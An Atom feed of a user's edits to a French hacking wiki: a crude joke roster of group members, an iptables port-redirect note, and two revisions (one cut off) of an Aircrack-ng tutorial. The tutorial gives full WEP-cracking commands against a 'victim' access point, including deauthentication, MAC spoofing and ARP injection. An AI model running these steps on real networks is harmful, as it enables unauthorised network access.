http://hack-it.org/index.php?feed=atom&target=Mattoufoutu&title=Sp%C3%A9cial%3AContributionsHack-it.org - Contributions de l’utilisateur [fr]2026-04-18T14:43:08ZDe Hack-it.org.MediaWiki 1.15.1http://hack-it.org/index.php?title=Pork_TeamPork Team2011-03-14T21:42:42Z<p>Mattoufoutu : /* mattoufoutu */</p>
<hr />
<div>Les oiseaux de passage<br />
<br />
txuus [R] Kiwi Euler SpAcEMaN2 Flusher Kheops Friz Disconnected DonDiego ZeBest DESPOTES yahourt [yop] z4ppy Emualynk wobu der_troll sun schnokbul karmamox T0aD Midna Skizophrenix ifrancois lapin bibifok Imad psykowolf psyke xerxas cyborg93 dragorz fraktal atak Anihilator Psylo Kalinoga Tr!n!Ty Schaka MaXiMaToR spiracle ravachol sbam brounie<br />
brakk<br />
fnord<br />
ff<br />
onozendai<br />
psychik<br />
roch<br />
miss rizz<br />
JFK99<br />
Chipster<br />
triskel<br />
flunkout<br />
beiron<br />
salska<br />
kasper<br />
josee<br />
luxifer<br />
mattoufoutu<br />
arareli<br />
bigsicret<br />
kewl<br />
psyke<br />
Thor<br />
sayber<br />
druid<br />
poil<br />
R<br />
tatata<br />
harluad<br />
lizil<br />
casual<br />
flox2<br />
champi<br />
itwer<br />
L'Ocus<br />
pokmoon<br />
absolut<br />
mardi_soir<br />
teuk<br />
eponae<br />
Thib- Tonyroy Ludwig Tom Oprhée Artefact<br />
<br />
Les bots<br />
<br />
Shalmaneser mediapork<br />
<br />
<br />
== Lizil ==<br />
<br />
Notre tout jeune et sémillant stagiaire. Refuse toute forme d'autorité, de contrainte ou de travail, mais nous fournit souvent un éclairage précieux sur les vocables et les modes de sa "e-génération". Lizil est un de ces ados branchés, férus de jeux vidéos, se regroupant sur des sites étranges qu'ils appellent des 4chans. Là bas, il a fondé avec d'autres sacripans un groupe de "noëlistes" avec qui il se livre à des tours pendables. Ces farceurs s'expriment dans un langage très créatif qui nous serait totalement abscons sans son aide et nous passerions pour des vieux cons. Voilà.<br />
<br />
Caractère: Instable. Profite de son jeune âge et de son aura de rebelle ténébreux pour séduire d'innocentes jeunes filles qu'il se plait ensuite à tourmenter. <br />
<br />
Compétences: Aucune. Ah si. Peut secréter lui même des toxines le conduisant à toutes sortes d'hallucinations, n'a donc pas besoin de se droguer.<br />
<br />
Uptime: moyen. tente d'avoir un nycthémère bien régulier malgré son absence d'occupation.<br />
<br />
<br />
== ff ==<br />
<br />
ff est un hibou. Parisien sceptique et blasé, est revenu de tout et n'est impressionné par rien. Il aime prendre des doses semi-mortelles d'une douzaine de substances psychotropes qu'il a synthétisé lui-même dans son laboratoire puis se rendre à un concert chiant de Radio France. Son plaisir est alors de s'entretenir toute la soirée avec la personne la plus ennuyeuse qu'il trouve tout en essayant de garder une apparence convenable malgré les effets démentiels de la drogue.<br />
<br />
Sa vraie passion: le ménage, le repassage, la vaisselle. ff est un maniaque du rangement. "Un appartement bien rangé, c'est le seul endroit où je peux me droguer"<br />
<br />
Compétences: multiples et vastes. chimiste, biologiste, musicologue, pétomane, séducteur de veuves éplorées. Egalement un UNIX-guru mais refuse d'aider les noobz parce qu'ils doivent apprendre par eux mêmes<br />
<br />
Uptime: moyen. diurne. considère l'irc comme une maitresse et donc ne la fréquente plus (par délicatesse) lorsqu'il est maqué.<br />
<br />
<br />
== FlUnKoUt ==<br />
<br />
FlUnKoUt a 4 passions: manger bio, gueuler contre le gouvernement, collectionner les mainframes dans son appartement et les sextoyz. Il rentre fatigué du boulot, se lave les mains au savon d'Alep et à l'eau minérale et se prépare une bonne pizza. Farine bio, levure bio, tomates bio origan bio, câpres bio etc. Puis commence le rituel: il allume son pc, ouvre 54 terminaux (un pour chaque machine) et tape cat /proc/cpuinfo dans chacun. Contemple avec concupiscence des dizaines d'architecture différentes et commence à se toucher à travers son pantalon. Ecume ensuite ebay à la recherche d'un cul moulé en latex avec poignées (molded ass with handles). Un peu de politique dans les RSS et sur usenet. Surfe finalement le web à la recherche de jpeg et avi scabreux genre lesbiennes qui chient et vomissent dans un bol. Une fois qu'il est tout à fait en transe, il allume sa webcam et chasse l'hétérosexuel, qu'il va amener du côté obscur en l'hypnotisant de ses yeux de serpents. S'endort et recommence.<br />
<br />
Compétences: véritable encyclopédie du sextoy. sait installer debian partout même sur le microcontroleur d'un cul moulé en latex avec poignées (molded ass etc)<br />
<br />
Uptime: très régulier. Se connecte à 19h38 et coupe à 01h43. Tous les jours depuis les modems RTC.<br />
<br />
== harluad ==<br />
<br />
Vieux marin tatoué de partout. Vit dans un camion qu'il a compilé lui même avec les flags mercedes diesel. Du coup il a que deux vitesses qui fonctionnent: la 3ème et la marche arrière. Thuriféraire de Gentoo, mais vous l'aurez deviné.<br />
<br />
== mattoufoutu ==<br />
<br />
Au lycée les filles quand elles parlaient entre elles le surnommaient "le python", il a d'ailleurs fini par se la faire tatouer, en python, avec des écailles et tout. C'était douloureux, mais wouah ça produit son effet. Mattoufoutu essaie de faire croire aux gens que son chien est un pur doberman mais les gens restent sceptiques: les pattes sont bien trop courtes et il a une drôle de touffe frisée sur la tête.<br />
Connecté depuis le wifi d'un voisin, ou un point-phone avec une carte méditerranéo il a souvent du mal à comprendre ce qu'on écrit à cause du brouhaha turco-berbéro-peul autour de lui. Fait la manche pour se payer un routeur linux.<br />
<br />
uptime: 24/24h<br />
<br />
== cerberus ==<br />
<br />
S'est retiré du monde quand sa calvitie a poussée. Il appelle ça son calvinisme, mais il est bizarre, faut dire. Il partage sa vie avec un chat asthmatique qui s'appelle Pline l'ancien. Ils vivent tous deux dans un appartement aux fenêtres murées. Cerberus est un adepte de seti@home, il attend des extra-terrestres. Sans computation, non, il pense tout simplement qu'ils viendront bientôt le chercher.<br />
<br />
compétences: Sait dessiner et tiens relativement bien la bouteille s'il s'agit de Calva. Collectionne les consoles Sega et détient toujours un record de points sur un obscur jeu japonais de Master System<br />
<br />
uptime: n00b<br />
<br />
== luxifer ==<br />
<br />
Se shoote au cactus. Luxifer a deux amours: l'UML et Led Zeppelin. Sa chambre est tapissée de posters: Led Zeppelin et divers diagrammes. S'amuse à faire croire qu'il s'occupe de généalogie et affirme avoir dans son arbre plusieurs indiens d'amérique dont des sioux.<br />
<br />
compétences: UML<br />
<br />
<br />
uptime: régulier.<br />
<br />
== Pandark ==<br />
Un tout nouveau, qui reve de vivre en chine pour bouffer du bambou cru. Il a monté son propren serveur web at home un jour ou il avait plus de shit pour comater. http://arkanda.co.cc/</div>Mattoufoutuhttp://hack-it.org/index.php?title=IptablesIptables2010-07-26T13:07:59Z<p>Mattoufoutu : </p>
<hr />
<div>== Forwarder un port vers l'autre pour une ip particulière ==<br />
iptables -t nat -I PREROUTING -i eth0 -s 91.165.96.43 -p tcp --dport 80 -j REDIRECT --to 22<br />
Très pratique quand on se retrouve sur un pc dont les ports non-http sont bloqués vers l'extérieur. Dans cet exemple, on redirige localement le port http vers ssh<br />
<br />
== Ajouter/enlever/modifier des regles ==<br />
La box dispose désormais d'un script de démarrage pour iptables, ça permet d'éviter de devoir refaire les règles à la main à chaque reboot.<br />
Donc pour ajouter une règle, ben ça se passe comme avant, via le shell. Sauf que maintenant, après avoir ajouté/retiré/modifié une regle, il faut bien penser à faire:<br />
/etc/init.d/iptables save<br />
pour sauvegarder les nouvelles regles</div>Mattoufoutuhttp://hack-it.org/index.php?title=IptablesIptables2010-07-26T13:05:27Z<p>Mattoufoutu : </p>
<hr />
<div>Forwarder un port vers l'autre pour une ip particulière<br />
iptables -t nat -I PREROUTING -i eth0 -s 91.165.96.43 -p tcp --dport 80 -j REDIRECT --to 22<br />
Très pratique quand on se retrouve sur un pc dont les ports non-http sont bloqués vers l'extérieur. Dans cet exemple, on redirige localement le port http vers ssh<br />
<br />
== Ajout de regles ==<br />
La box dispose désormais d'un script de démarrage pour iptables, ça permet d'éviter de devoir refaire les règles à la main à chaque reboot.<br />
Donc pour ajouter une règle, ben ça se passe comme avant, via le shell. Sauf que maintenant, après avoir ajouté/retiré/modifié une regle, il faut bien penser à faire:<br />
/etc/init.d/iptables save<br />
pour sauvegarder les nouvelles regles</div>Mattoufoutuhttp://hack-it.org/index.php?title=Aircrack-ngAircrack-ng2009-05-16T21:47:28Z<p>Mattoufoutu : /* Méthode "-p 0841" */</p>
<hr />
<div>== Les outils de la suite aircrack ==<br />
<br />
=== aircrack-ng ===<br />
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.<br />
<br />
=== airbase-ng ===<br />
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap".<br />
<br />
=== airdecap-ng ===<br />
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.<br />
<br />
=== airdecloak-ng ===<br />
Sert à décloaker (démasquer) les bssid cloakés<br />
<br />
=== airdriver-ng ===<br />
Sert à compiler, dés/installer les drivers appropriés à votre carte.<br />
<br />
=== aireplay-ng ===<br />
Sert à injecter des paquets et à s'authentifier auprès des AP.<br />
<br />
=== airmon-ng ===<br />
Sert à dés/activer le mode monitor sur votre carte.<br />
<br />
=== airodump-ng ===<br />
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.<br />
<br />
=== airserv-ng ===<br />
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.<br />
<br />
=== airolib-ng ===<br />
Permet de créer une base de données sqlite en vue d'un crack WPA.<br />
<br />'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''<br />
<br />
=== airtun-ng ===<br />
<br />
=== buddy-ng ===<br />
A utiliser avec easside-ng<br />
<br />
=== easside-ng ===<br />
Outil "auto-magic" permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.<br />
<br />
=== ivstools ===<br />
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.<br />
<br />
=== makeivs ===<br />
Permet de créer un fichier .ivs à partir d'une clé WEP connue.<br />
<br />
=== packetforge-ng ===<br />
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).<br />
<br />
=== tkiptun-ng ===<br />
Permet d'aider au crack de clés WPA utilisant TKIP.<br />
<br />'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''<br />
<br />
=== wesside-ng ===<br />
Outil permettant l'automatisation du crack de clé WEP.<br />
<br />
<br />
<center><big><u>'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''</u></big></center><br />
<br />
== Les drivers WiFi ==<br />
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.<br />
* Pour connaitre les drivers supportés:<br />
>>> airdriver-ng supported<br />
<br />
* Pour connaitre les drivers déjà installés:<br />
>>> aidriver-ng installed<br />
<br />
* Pour connaitre les drivers WiFi chargés dans le kernel:<br />
>>> airdriver-ng loaded<br />
<br />
* Pour détecter les cartes WiFi:<br />
>>> airdriver-ng detect<br />
<br />
* Pour décharger un driver inutile:<br />
>>> airdriver-ng unload $num_driver<br />
<br />
* Pour compiler un driver:<br />
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:<br />
<br />>>> airdriver-ng compile $num_driver<br />
<br />
* Pour installer un driver fraichement compilé:<br />
>>> airdriver-ng install $num_driver<br />
<br />
* Pour charger un driver dans le kernel:<br />
>>> airdriver-ng load $num_driver<br />
<br />
* Pour avoir des détails sur un driver:<br />
>>> airdriver-ng details $num_driver<br />
<br />
<br />
== Les différents types d'attaques ==<br />
Dans les cas où l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.<br />
<br />
=== Légende ===<br />
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)<br />
<br />$canal = canal wifi à utiliser (colonne "CH" dans airodump-ng)<br />
<br />$bssid_cible = BSSID du point d'acces ciblé<br />
<br />$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)<br />
<br />$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)<br />
<br />$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne "STATION" dans airodump-ng)<br />
<br />
=== Mac spoofing ===<br />
Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte:<br />
<br />>>> ifconfig $iface down<br />
<br />>>>macchanger --mac $mac_client $iface<br />
<br />
=== Méthode "ARP replay" ===<br />
'''Méthode avec client et sans filtrage MAC'''<br />
* Mettre carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-1 = fake association<br />
<br />30 = temps d'attente entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-3 = attaque ARP replay<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />''CRACKED !!!''<br />
<br />
=== Methode "chop-chop" et "par fragmentation" ===<br />
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodum-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfice à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
** En cas de filtrage MAC:<br />
>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface<br />
<br />-0 = déauthentification<br />
<br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)<br />
<br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP<br />
<br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''<br />
<br />
* Attaque:<br />
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.<br />
<br />Dans les 2 cas, un fichier .xor sera créé en cas de succès.<br />
** Par fragmentation:<br />
>>> aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface<br />
<br />-5 = attaque par fragmentation<br />
** Chop-chop:<br />
>>> aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface<br />
<br />-4 = attaque chop-chop<br />
<br />
* Création d'un paquet ARP:<br />
>>> packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp<br />
<br />-0 = générer un paquet ARP<br />
<br />-k = IP de destination (la plupart des AP répondent au 255.255.255.255)<br />
<br />-l = IP source (la plupart des AP répondent au 255.255.255.255)<br />
<br />-w = nom du fichier dans lequel mettre le paquet ARP<br />
<br />
* Injection de l'ARP:<br />
>>> aireplay-ng -2 -r $fichier_arp $iface<br />
<br />-2 = selection de paquets interactive (accepter le paquet avec "y")<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />''CRACKED''<br />
<br />
=== Méthode "-p 0841" ===<br />
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en mode monitor:<br />
>>> ifconfig $iface down<br />
>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à la station:<br />
>>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succès, "Association successful :-)" doit s'afficher<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
** En cas de filtrage MAC:<br />
>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface<br />
<br />-0 = déauthentification<br />
<br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)<br />
<br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP<br />
<br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface<br />
<br />-2 = sélection de paquets interactive (accepter le paquet avec "y")<br />
<br />-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />''CRACKED''</div>Mattoufoutuhttp://hack-it.org/index.php?title=Aircrack-ngAircrack-ng2008-12-20T19:57:41Z<p>Mattoufoutu : </p>
<hr />
<div>== Les outils de la suite aircrack ==<br />
<br />
=== aircrack-ng ===<br />
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.<br />
<br />
=== airbase-ng ===<br />
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au "fake-ap".<br />
<br />
=== airdecap-ng ===<br />
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.<br />
<br />
=== airdecloak-ng ===<br />
Sert à décloaker (démasquer) les bssid cloakés<br />
<br />
=== airdriver-ng ===<br />
Sert à compiler, dés/installer les drivers appropriés à votre carte.<br />
<br />
=== aireplay-ng ===<br />
Sert à injecter des paquets et à s'authentifier auprès des AP.<br />
<br />
=== airmon-ng ===<br />
Sert à dés/activer le mode monitor sur votre carte.<br />
<br />
=== airodump-ng ===<br />
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.<br />
<br />
=== airserv-ng ===<br />
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.<br />
<br />
=== airolib-ng ===<br />
Permet de créer une base de données sqlite en vue d'un crack WPA.<br />
<br />'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''<br />
<br />
=== airtun-ng ===<br />
<br />
=== buddy-ng ===<br />
A utiliser avec easside-ng<br />
<br />
=== easside-ng ===<br />
Outil "auto-magic" permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.<br />
<br />
=== ivstools ===<br />
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.<br />
<br />
=== makeivs ===<br />
Permet de créer un fichier .ivs à partir d'une clé WEP connue.<br />
<br />
=== packetforge-ng ===<br />
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).<br />
<br />
=== tkiptun-ng ===<br />
Permet d'aider au crack de clés WPA utilisant TKIP.<br />
<br />'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''<br />
<br />
=== wesside-ng ===<br />
Outil permettant l'automatisation du crack de clé WEP.<br />
<br />
<br />
<center><big><u>'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''</u></big></center><br />
<br />
== Les drivers WiFi ==<br />
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.<br />
* Pour connaitre les drivers supportés:<br />
>>> airdriver-ng supported<br />
<br />
* Pour connaitre les drivers déjà installés:<br />
>>> aidriver-ng installed<br />
<br />
* Pour connaitre les drivers WiFi chargés dans le kernel:<br />
>>> airdriver-ng loaded<br />
<br />
* Pour détecter les cartes WiFi:<br />
>>> airdriver-ng detect<br />
<br />
* Pour décharger un driver inutile:<br />
>>> airdriver-ng unload $num_driver<br />
<br />
* Pour compiler un driver:<br />
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:<br />
<br />>>> airdriver-ng compile $num_driver<br />
<br />
* Pour installer un driver fraichement compilé:<br />
>>> airdriver-ng install $num_driver<br />
<br />
* Pour charger un driver dans le kernel:<br />
>>> airdriver-ng load $num_driver<br />
<br />
* Pour avoir des détails sur un driver:<br />
>>> airdriver-ng details $num_driver<br />
<br />
<br />
== Les différents types d'attaques ==<br />
Dans les cas où l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte.<br />
<br />
=== Légende ===<br />
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)<br />
<br />$canal = canal wifi à utiliser (colonne "CH" dans airodump-ng)<br />
<br />$bssid_cible = BSSID du point d'acces ciblé<br />
<br />$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)<br />
<br />$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)<br />
<br />$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne "STATION" dans airodump-ng)<br />
<br />
=== Mac spoofing ===<br />
Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte:<br />
<br />>>> ifconfig $iface down<br />
<br />>>>macchanger --mac $mac_client $iface<br />
<br />
=== Méthode "ARP replay" ===<br />
'''Méthode avec client et sans filtrage MAC'''<br />
* Mettre carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-1 = fake association<br />
<br />30 = temps d'attente entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
<br />
* Lancer l'injection:<br />
>>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface<br />
<br />-3 = attaque ARP replay<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />''CRACKED !!!''<br />
<br />
=== Methode "chop-chop" et "par fragmentation" ===<br />
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en monitor:<br />
>>> ifconfig $iface down<br />
<br />>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodum-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfice à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à l'AP:<br />
>>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succes, "Association successful :-)" doit s'afficher''<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />6000 = temps d'attente (en ms) entre 2 tentatives<br />
<br />-o = nombre de jeux de paquets à envoyer à la fois<br />
<br />-q = intervale entre 2 paquets "keep-alive"<br />
** En cas de filtrage MAC:<br />
>>> aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface<br />
<br />-0 = déauthentification<br />
<br />1 = nombre de deauth à envoyer à la fois (0 -> indéfiniment)<br />
<br />-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP<br />
<br />''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''<br />
<br />
* Attaque:<br />
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.<br />
<br />Dans les 2 cas, un fichier .xor sera créé en cas de succès.<br />
** Par fragmentation:<br />
>>> aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface<br />
<br />-5 = attaque par fragmentation<br />
** Chop-chop:<br />
>>> aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface<br />
<br />-4 = attaque chop-chop<br />
<br />
* Création d'un paquet ARP:<br />
>>> packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp<br />
<br />-0 = générer un paquet ARP<br />
<br />-k = IP de destination (la plupart des AP répondent au 255.255.255.255)<br />
<br />-l = IP source (la plupart des AP répondent au 255.255.255.255)<br />
<br />-w = nom du fichier dans lequel mettre le paquet ARP<br />
<br />
* Injection de l'ARP:<br />
>>> aireplay-ng -2 -r $fichier_arp $iface<br />
<br />-2 = selection de paquets interactive (accepter le paquet avec "y")<br />
<br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''<br />
<br />
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:<br />
>>> aircrack-ng $fichier_capture<br />
<br />''CRACKED''<br />
<br />
=== Méthode "-p 0841" ===<br />
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''<br />
* Mettre la carte en mode monitor:<br />
>>> ifconfig $iface down<br />
>>> airmon-ng start $iface<br />
<br />
* Trouver une victime:<br />
>>> airodump-ng $iface<br />
<br />''Couper une fois la victime trouvée''<br />
<br />
* Lancer la capture d'IVs:<br />
>>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface<br />
<br />-w = préfixe à utiliser pour le nom du fichier de capture<br />
<br />''Laisser tourner...''<br />
<br />
* Associer la carte à la station:<br />
>>> aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
<br />-1 = fake association<br />
<br />0 = temps d'attente (en ms) entre 2 tentatives<br />
<br />''En cas de succès, "Association successful :-)" doit s'afficher<br />
** En cas d'échec:<br />
>>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface<br />
